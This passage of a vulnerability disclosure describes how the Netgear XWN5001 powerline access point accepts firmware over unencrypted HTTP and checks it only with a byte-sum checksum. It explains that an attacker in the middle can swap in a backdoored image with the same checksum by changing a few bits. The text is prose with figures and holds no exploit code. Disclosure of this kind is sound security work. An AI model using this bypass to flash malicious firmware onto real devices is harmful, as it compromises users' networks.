!\[\](https://i.imgur.com/TGa3aui.png) \*Fig. 1. Firmware header before modification.\* !\[\](https://i.imgur.com/HaaCgDO.png "Firmware header after modification") \*Fig. 2. Firmware header after modification.\* ## Vulnerability #2 - Firmware Modification Attack ### Overview: An exploitable firmware modification attack vulnerability was discovered on the Netgear XWN5001 – Powerline 500 WiFi Access Point. The data integrity of the uploaded firmware image is ensured with a fixed checksum number. Therefore, an attacker can conduct a MITM attack to modify the user-uploaded firmware image and bypass the checksum verification. A successful attack can either introduce a backdoor or malware to the device or make the device DoS. ### Details: When performing a firmware update, users can download a new firmware image from the vendor server and upload it via the web interface of the device. The web interface uses HTTP protocol, which does not provide any cryptographic protection of the uploaded contents. Therefore, the firmware update process is vulnerable to man-in-the-middle (MITM) attacks. For the firwmare image, the first 128 bytes of the firmware image contain firmware metadata, including device model, firmware version, region, etc. It is worth noting that, when a new firmware image is uploaded, the device checks the version of the uploaded firmware by reading the metadata and checks the file integrity by summing all bytes of the file. Specifically, if the new version number is larger than the current version number and the sum of all bytes of the new firmware image equals -1, the version check and file integrity check can be passed. Such an integrity check can be easily bypassed as long as ensuring the modified firmware image has the same checksum with that as the original firmware image. For example, Fig. 3 and Fig. 4 are the fragments from the original firmware image and the modified firmware image, respectively. By modifying two bits, the modified firmware can bypass firmware verification successfully. An attacker can craft a malicious firmware image and replace the benign firmware image during the firmware update process via a MITM attack so that the malicious firmware image can be flashed into the device. !\[\](https://i.imgur.com/zSDGVMz.png) \*Fig. 3. Firmware fragment before modification.\* !\[\](https://i.imgur.com/RiU4FZA.png) \*Fig. 4. Firmware fragment after modification.\*

Tag

#wifi